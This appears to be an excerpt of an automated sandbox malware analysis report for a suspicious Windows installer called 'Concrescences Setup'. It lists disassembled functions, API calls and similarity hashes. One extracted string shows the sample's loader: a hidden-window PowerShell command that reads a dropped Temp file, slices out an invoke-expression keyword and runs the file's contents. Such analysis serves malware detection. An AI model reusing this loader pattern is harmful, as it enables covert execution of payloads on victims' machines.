                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 0040545B
                                      • GetLastError.KERNEL32 ref: 00405469
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID:
                                      • API String ID: 1375471231-0
                                      • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                      • Instruction ID: ace853db513f64caea17b5c73fb52fb3118c2a3fabff3065b7385b8b337d2f64
                                      • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                      • Instruction Fuzzy Hash: 9DC08C30B18101EAC6100B30AE087073D50AB00742F1444356206E10E0C6309050CD2F
                                      Function 00401717 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: PathSearch
                                      • String ID:
                                      • API String ID: 2203818243-0
                                      • Opcode ID: 985a7ae01e69da493872186c6c10ed37eba87bebab26c0abac89a8346f6e59b4
                                      • Instruction ID: 4c956aff6f0d258c6848a8c99906dcba9d38e98bcd0b2081640ab90df76b8672
                                      • Opcode Fuzzy Hash: 985a7ae01e69da493872186c6c10ed37eba87bebab26c0abac89a8346f6e59b4
                                      • Instruction Fuzzy Hash: E5E0D8B2204100ABE700DB549D48FAA3798DB10368B30853BF201A50C1D2B89A459629
                                      Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
                                      • Instruction ID: 6913ff832cf321f63cdd7bb00c8cc70b6829a5dd8220bacc95ff598af340a114
                                      • Opcode Fuzzy Hash: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
                                      • Instruction Fuzzy Hash: 7FE04FB6240108AFDB00DFA4DD46F9577FCE718701F008021B608D7091C674E5508B69
                                      Function 00405A13 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040305C,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405A27
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                      • Instruction ID: edb1125888c6416cb1e0b95ca9609c2ac4c4c792cbd4e8f88826aa2405e91300
                                      • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                      • Instruction Fuzzy Hash: D7E0EC3261425EEFDF109E659C40AEB7B6DEB053A4F048532FD25E2150E271E8219FB5
                                      Function 004059E4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040308E,00000000,00000000,00402EEB,000000FF,00000004,00000000,00000000,00000000), ref: 004059F8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                      • Instruction ID: 6c2e581bc83b2d89c4a498056592e8f52b2bea012b9e1656670f40d352b29975
                                      • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                      • Instruction Fuzzy Hash: 4DE0EC3272429AABDF109E559C44EEF7BACEB05360F048932FD15E3190D235ED219FA9
                                      Function 00403F2A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F3C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                      • Instruction ID: b8addb9e81407d18270a6acc8ad8b47d243914a4c892372c87671a3bfdf31127
                                      • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                      • Instruction Fuzzy Hash: B6C04C71B482017AEA21CB509D49F0677686750B01F5584757210E50D0C6B4E451D62D
                                      Function 00403F13 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                      • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                      • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                      • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                      Function 00403091 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                      Function 00403F00 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00403CDD), ref: 00403F0A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                      • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                      • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                      • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A

                                      Non-executed Functions

                                      Function 0040488F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 004048A7
                                      • GetDlgItem.USER32(?,00000408), ref: 004048B2
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004048FC
                                      • LoadBitmapA.USER32(0000006E), ref: 0040490F
                                      • SetWindowLongA.USER32(?,000000FC,00404E86), ref: 00404928
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040493C
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 0040494E
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404964
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404970
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404982
                                      • DeleteObject.GDI32(00000000), ref: 00404985
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B0
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049BC
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A51
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A7C
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A90
                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404ABF
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404ACD
                                      • ShowWindow.USER32(?,00000005), ref: 00404ADE
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDB
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C40
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C55
                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C79
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C99
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404CAE
                                      • GlobalFree.KERNEL32(00000000), ref: 00404CBE
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D37
                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE0
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DEF
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E0F
                                      • ShowWindow.USER32(?,00000000), ref: 00404E5D
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404E68
                                      • ShowWindow.USER32(00000000), ref: 00404E6F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
                                      • Instruction ID: e7c54df8ad39b376662a796d960b289492e5a6982c1727c2c37b81bede79f7f2
                                      • Opcode Fuzzy Hash: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
                                      • Instruction Fuzzy Hash: 43025EB0A00209AFEF109F54DC85AAE7BB5FB84315F10817AF611B62E1D7789E42DF58
                                      Function 0040431C Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003FB), ref: 0040436B
                                      • SetWindowTextA.USER32(00000000,?), ref: 00404395
                                      • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404446
                                      • CoTaskMemFree.OLE32(00000000), ref: 00404451
                                      • lstrcmpiA.KERNEL32(: Completed,Concrescences Setup: Completed), ref: 00404483
                                      • lstrcatA.KERNEL32(?,: Completed), ref: 0040448F
                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A1
                                        • Part of subcall function 004054D3: GetDlgItemTextA.USER32(?,?,00000400,004044D8), ref: 004054E6
                                        • Part of subcall function 00405F64: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FBC
                                        • Part of subcall function 00405F64: CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
                                        • Part of subcall function 00405F64: CharNextA.USER32(?,"C:\Users\user\Desktop\anziOUzZJs.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FCE
                                        • Part of subcall function 00405F64: CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,004030B4,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405FDE
                                      • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 0040455F
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457A
                                        • Part of subcall function 004046D3: lstrlenA.KERNEL32(Concrescences Setup: Completed,Concrescences Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
                                        • Part of subcall function 004046D3: wsprintfA.USER32 ref: 00404779
                                        • Part of subcall function 004046D3: SetDlgItemTextA.USER32(?,Concrescences Setup: Completed), ref: 0040478C
                                      Strings
                                      • A, xrefs: 0040443F
                                      • : Completed, xrefs: 0040447D, 00404482, 0040448D
                                      • Concrescences Setup: Completed, xrefs: 00404419, 0040447C
                                      • "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", xrefs: 00404335
                                      • C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 0040446C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$: Completed$A$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$Concrescences Setup: Completed
                                      • API String ID: 2624150263-4182621402
                                      • Opcode ID: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
                                      • Instruction ID: 222947b4accbc62cc0073c5541b0f9589876626f1104fcc3d8441c992cea6716
                                      • Opcode Fuzzy Hash: 1558e11706ab6d26c01ec83b0c58713cad93a9e9ab837f02d5dc5529ec40a987
                                      • Instruction Fuzzy Hash: 71A17EB1900209ABDB11AFA5CC45BEFB6B8EF84315F14843BF711B62D1D77C8A418B69
                                      Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: a8d2051a0b43e45e0548476364d3f5ec7a3e7dc7c9238cb7b637b6be69fa9f30
